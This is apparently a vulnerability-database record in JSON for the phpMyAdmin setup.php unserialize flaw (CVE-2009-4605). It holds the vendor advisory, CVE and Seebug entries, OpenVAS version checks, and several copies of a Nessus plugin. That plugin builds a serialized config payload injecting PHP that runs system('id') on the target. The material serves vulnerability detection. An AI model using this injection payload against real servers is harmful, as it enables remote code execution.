\"$cfg['Servers'][$i]['\"+array_name+\"']['\" + inj_code;\nconfig=\n 'a:1:{'+\n 's:7:\"Servers\";'+\n 'a:1:{'+\n 'i:0;'+\n 'a:1:{'+\n 's:'+strlen(array_name)+':\"'+array_name+'\";'+\n 'a:1:{'+\n 's:'+strlen(inj_code)+':\"'+inj_code+'\";'+\n 's:0:\"\";'+\n '}'+\n '}'+\n '}'+\n '}';\npostdata =\n 'token='+token+'&'+\n 'action=download&'+\n 'configuration='+urlencode(str:config);\nres = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n data:postdata,\n content_type:\"application/x-www-form-urlencoded\",\n exit_on_fail:TRUE\n);\n\nif (expected_out >< res[2])\n{\n if (!config_writeable)\n {\n report =\n '\\nEven though the software is unpatched, the web server does not\\n'+\n 'have permission to write the configuration file to disk, which\\n'+\n 'means the vulnerability cannot be exploited at this time.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir']+'/', port:port);\n exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');\n}\n", "title": "phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-11-17T02:56:34"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "cvelist": ["CVE-2009-4605"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection.\n\nA remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "e92028682270d42108a9ffc9f8845eb09d2c9e7138c9dc34a391618eeae76d9a", "hashmap": [{"hash": "4e9ff411278dd1e0a2396e82da16469b", "key": "modified"}, {"hash": "e2f82ebe32f4f00f604292ef7c12b5d1", "key": "title"}, {"hash": "df07826cb9568f42b41e100c569903e2", "key": "cvelist"}, {"hash": "625f66b220dbcca95ae964c660cb5883", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c568b86ab2f9135262f92f00a89c6a88", "key": "published"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "47af08ad97148c117568258e69b69123", "key": "sourceData"}, {"hash": "1a6ed6fef49ad1cd2a9ff0f83967cd63", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "4a2dcbdbd245f176c09d80ac3f56f340", "key": "pluginID"}, {"hash": "4356f9674f9e8077781321f4ba679e31", "key": "href"}, {"hash": "a252701a32e43adc64ece9e2459d8495", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44324", "id": "PHPMYADMIN_PMASA_2010_3.NASL", "lastseen": "2018-07-30T13:47:45", "modified": "2018-07-24T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44324", "published": "2010-01-27T00:00:00", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44324);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2009-4605\");\n script_bugtraq_id(37861);\n script_xref(name:\"Secunia\", value:\"38211\");\n\n script_name(english:\"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)\");\n script_summary(english:\"Checks if code can be injected into the config file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a PHP application that may allow\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);\n\n# The first request makes sure the page exists, the PMA config is writeable,\n# and extracts the token\nurl = install['dir']+'/scripts/setup.php';\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n# If the config can't be written to disk, this cannot be exploited - even\n# if the software is unpatched. In which case, only continue if paranoid.\nif ('Can not load or save configuration' >< res[2])\n{\n if (report_paranoia < 2)\n exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');\n else\n config_writeable = FALSE;\n}\nelse config_writeable = TRUE;\n\n# Extract the token.\ntoken = NULL;\npat = 'input type=\"hidden\" name=\"token\" value=\"([^\"]+)\"';\nmatch = eregmatch(string:res[2], pattern:pat);\nif (match) token = match[1];\nelse exit(1, \"Unable to extract token from \"+build_url(qs:url, port:port));\n\n# The second request determines if PHP code can be injected into the config file\ncmd = 'id';\narray_name = \"TNS\";\ninj_code = SCRIPT_NAME+\"'] = \"+unixtime()+\"; system('\"+cmd+\"'); //\";\nexpected_out = \"$cfg['Servers'][$i]['\"+array_name+\"']['\" + inj_code;\nconfig=\n 'a:1:{'+\n 's:7:\"Servers\";'+\n 'a:1:{'+\n 'i:0;'+\n 'a:1:{'+\n 's:'+strlen(array_name)+':\"'+array_name+'\";'+\n 'a:1:{'+\n 's:'+strlen(inj_code)+':\"'+inj_code+'\";'+\n 's:0:\"\";'+\n '}'+\n '}'+\n '}'+\n '}';\npostdata =\n 'token='+token+'&'+\n 'action=download&'+\n 'configuration='+urlencode(str:config);\nres = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n data:postdata,\n content_type:\"application/x-www-form-urlencoded\",\n exit_on_fail:TRUE\n);\n\nif (expected_out >< res[2])\n{\n if (!config_writeable)\n {\n report =\n '\\nEven though the software is unpatched, the web server does not\\n'+\n 'have permission to write the configuration file to disk, which\\n'+\n 'means the vulnerability cannot be exploited at this time.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir']+'/', port:port);\n exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');\n}\n", "title": "phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-30T13:47:45"}], "edition": 13, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "625f66b220dbcca95ae964c660cb5883"}, {"key": "cvelist", "hash": "df07826cb9568f42b41e100c569903e2"}, {"key": "cvss", "hash": "b5bbdd851ff7634dd01c09e00d03be1e"}, {"key": "description", "hash": "e2e9af6ce69aab43634635bd3d257969"}, {"key": "href", "hash": "d1b191fd24b45711cc736ac73202e8f2"}, {"key": "modified", "hash": "248ddfee5cc8aa2c1a4fce14baf1e1b1"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "4a2dcbdbd245f176c09d80ac3f56f340"}, {"key": "published", "hash": "c568b86ab2f9135262f92f00a89c6a88"}, {"key": "references", "hash": "1e680a3aecedfc0b9aa705a5e591a170"}, {"key": "reporter", "hash": "03db36597b98092613edba567eb84b31"}, {"key": "sourceData", "hash": "14e733c11363439b9bec6bf9c48f972c"}, {"key": "title", "hash": "e2f82ebe32f4f00f604292ef7c12b5d1"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "737b8b8d049558dc338db2b3f043797535f6b3186206514a119c613dbe03f215", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4605"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2010-3"]}, {"type": "seebug", "idList": ["SSV:18972"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310100589", "OPENVAS:67338", "OPENVAS:136141256231067338"]}, {"type": "nessus", "idList": ["SUSE_11_0_PHPMYADMIN-091209.NASL", "DEBIAN_DSA-2034.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2034-1:622E3"]}], "modified": "2020-02-01T01:41:45"}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-02-01T01:41:45"}, "vulnersScore": 7.6}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44324);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2009-4605\");\n script_bugtraq_id(37861);\n script_xref(name:\"Secunia\", value:\"38211\");\n\n script_name(english:\"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)\");\n script_summary(english:\"Checks if code can be injected into the config file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a PHP application that may allow\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpmyadmin.net/security/PMASA-2010-3/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);\n\n# The first request makes sure the page exists, the PMA config is writeable,\n# and extracts the token\nurl = install['dir']+'/scripts/setup.php';\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n# If the config can't be written to disk, this cannot be exploited - even\n# if the software is unpatched. In which case, only continue if paranoid.\nif ('Can not load or save configuration' >< res[2])\n{\n if (report_paranoia < 2)\n exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');\n else\n config_writeable = FALSE;\n}\nelse config_writeable = TRUE;\n\n# Extract the token.\ntoken = NULL;\npat = 'input type=\"hidden\" name=\"token\" value=\"([^\"]+)\"';\nmatch = eregmatch(string:res[2], pattern:pat);\nif (match) token = match[1];\nelse exit(1, \"Unable to extract token from \"+build_url(qs:url, port:port));\n\n# The second request determines if PHP code can be injected into the config file\ncmd = 'id';\narray_name = \"TNS\";\ninj_code = SCRIPT_NAME+\"'] = \"+unixtime()+\"; system('\"+cmd+\"'); //\";\nexpected_out = \"$cfg['Servers'][$i]['\"+array_name+\"']['\" + inj_code;\nconfig=\n 'a:1:{'+\n 's:7:\"Servers\";'+\n 'a:1:{'+\n 'i:0;'+\n 'a:1:{'+\n 's:'+strlen(array_name)+':\"'+array_name+'\";'+\n 'a:1:{'+\n 's:'+strlen(inj_code)+':\"'+inj_code+'\";'+\n 's:0:\"\";'+\n '}'+\n '}'+\n '}'+\n '}';\npostdata =\n 'token='+token+'&'+\n 'action=download&'+\n 'configuration='+urlencode(str:config);\nres = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n data:postdata,\n content_type:\"application/x-www-form-urlencoded\",\n exit_on_fail:TRUE\n);\n\nif (expected_out >< res[2])\n{\n if (!config_writeable)\n {\n report =\n '\\nEven though the software is unpatched, the web server does not\\n'+\n 'have permission to write the configuration file to disk, which\\n'+\n 'means the vulnerability cannot be exploited at this time.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir']+'/', port:port);\n exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');\n}\n", "naslFamily": "CGI abuses", "pluginID": "44324", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:10:01", "bulletinFamily": "NVD", "description": "scripts/setup.php (aka the setup script) in phpMyAdmin 2.11.x before 2.11.10 calls the unserialize function on the values of the (1) configuration and (2) v[0] parameters, which might allow remote attackers to conduct cross-site request forgery (CSRF) attacks via unspecified vectors.", "modified": "2010-05-06T05:52:00", "id": "CVE-2009-4605", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4605", "published": "2010-01-19T16:30:00", "title": "CVE-2009-4605", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "phpmyadmin": [{"lastseen": "2019-05-29T17:20:07", "bulletinFamily": "software", "description": "## PMASA-2010-3\n\n**Announcement-ID:** PMASA-2010-3\n\n**Date:** 2010-01-15\n\n**Updated:** 2010-01-27\n\n### Summary\n\nUnsafe usage of unserialize function.\n\n### Description\n\nphpMyAdmin used the unserialize() PHP function on potentially unsafe data in setup script, what could be potentially used for XSRF attack, which can lead to code execution.\n\n### Severity\n\nWe consider these vulnerabilities to be critical.\n\n### Affected Versions\n\nFor 2.11.x: versions before 2.11.10 are affected.\n\n### Unaffected Versions\n\n3.x releases are not affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.0.0 or 2.11.10.\n\n### References\n\nWe wish to thank to Thomas Biege and Sebastian Krahmer for pointing out this issue.\n\nAssigned CVE ids: [CVE-2009-4605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4605>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-352](<https://cwe.mitre.org/data/definitions/352.html>)\n\n### Patches\n\nThe following commits have been made on the 2.11 branch to fix this issue:\n\n * [719e0dce659f4a452d06a26e9432d888531a6e7b](<https://github.com/phpmyadmin/phpmyadmin/commit/719e0dce659f4a452d06a26e9432d888531a6e7b>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "modified": "2010-01-27T00:00:00", "published": "2010-01-15T00:00:00", "id": "PHPMYADMIN:PMASA-2010-3", "href": "https://www.phpmyadmin.net/security/PMASA-2010-3/", "title": "Unsafe usage of unserialize function.", "type": "phpmyadmin", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "seebug": [{"lastseen": "2017-11-19T18:15:43", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 37861\r\nCVE(CAN) ID: CVE-2009-4605\r\n\r\nphpMyAdmin\u662f\u7528PHP\u7f16\u5199\u7684\u5de5\u5177\uff0c\u7528\u4e8e\u901a\u8fc7WEB\u7ba1\u7406MySQL\u3002\r\n\r\nphpMyAdmin\u4f7f\u7528\u4e86\u4f20\u9001\u7ed9scripts/setup.php\u811a\u672c\u7684configuration\u548cv[0]\u8f93\u5165\u53c2\u6570\u6765\u8c03\u7528unserialize\u51fd\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u8bf7\u6c42\u6267\u884c\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u653b\u51fb\uff0c\u4ee5\u5176\u4ed6\u7528\u6237\u7684\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\nphpMyAdmin 2.11.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nphpMyAdmin\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.phpmyadmin.net/", "modified": "2010-01-21T00:00:00", "published": "2010-01-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18972", "id": "SSV:18972", "title": "phpMyAdmin unserialize()\u8c03\u7528\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": ""}], "openvas": [{"lastseen": "2019-05-29T18:40:13", "bulletinFamily": "scanner", "description": "phpMyAdmin is prone to a vulnerability that lets attackers execute\n arbitrary code in the context of the webserver process.", "modified": "2019-03-01T00:00:00", "published": "2010-04-20T00:00:00", "id": "OPENVAS:1361412562310100589", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100589", "title": "phpMyAdmin 'unserialize()' Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_37861.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# phpMyAdmin 'unserialize()' Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100589\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-20 13:41:39 +0200 (Tue, 20 Apr 2010)\");\n script_bugtraq_id(37861);\n script_cve_id(\"CVE-2009-4605\");\n script_name(\"phpMyAdmin 'unserialize()' Remote Code Execution Vulnerability\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37861\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a vulnerability that lets attackers execute\n arbitrary code in the context of the webserver process.\");\n\n script_tag(name:\"impact\", value:\"This may facilitate unauthorized access or privilege escalation.\n Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"Versions prior to phpMyAdmin 3.0.0 or 2.11.10 are vulnerable.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"2.11.10\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.11.10/3.0.0\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2018-01-08T12:54:00", "bulletinFamily": "scanner", "description": "The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2034-1.", "modified": "2018-01-05T00:00:00", "published": "2010-05-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067338", "id": "OPENVAS:136141256231067338", "title": "Debian Security Advisory DSA 2034-1 (phpmyadmin)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2034_1.nasl 8296 2018-01-05 07:28:01Z teissa $\n# Description: Auto-generated from advisory DSA 2034-1 (phpmyadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2008-7251\n\nphpMyAdmin may create a temporary directory, if the configured directory\ndoes not exist yet, with insecure filesystem permissions.\n\nCVE-2008-7252\n\nphpMyAdmin uses predictable filenames for temporary files, which may\nlead to a local denial of service attack or privilege escalation.\n\nCVE-2009-4605\n\nThe setup.php script shipped with phpMyAdmin may unserialize untrusted\ndata, allowing for cross site request forgery.\n\n\nFor the stable distribution (lenny), these problems have been fixed in version\nphpmyadmin 2.11.8.1-5+lenny4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.2.4-1.\n\nWe recommend that you upgrade your phpmyadmin package.\";\ntag_summary = \"The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2034-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202034-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.67338\");\n script_version(\"$Revision: 8296 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 08:28:01 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 05:52:15 +0200 (Tue, 04 May 2010)\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2009-4605\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 2034-1 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"phpmyadmin\", ver:\"2.11.8.1-5+lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:14", "bulletinFamily": "scanner", "description": "The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2034-1.", "modified": "2017-07-07T00:00:00", "published": "2010-05-04T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=67338", "id": "OPENVAS:67338", "title": "Debian Security Advisory DSA 2034-1 (phpmyadmin)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2034_1.nasl 6614 2017-07-07 12:09:12Z cfischer $\n# Description: Auto-generated from advisory DSA 2034-1 (phpmyadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2008-7251\n\nphpMyAdmin may create a temporary directory, if the configured directory\ndoes not exist yet, with insecure filesystem permissions.\n\nCVE-2008-7252\n\nphpMyAdmin uses predictable filenames for temporary files, which may\nlead to a local denial of service attack or privilege escalation.\n\nCVE-2009-4605\n\nThe 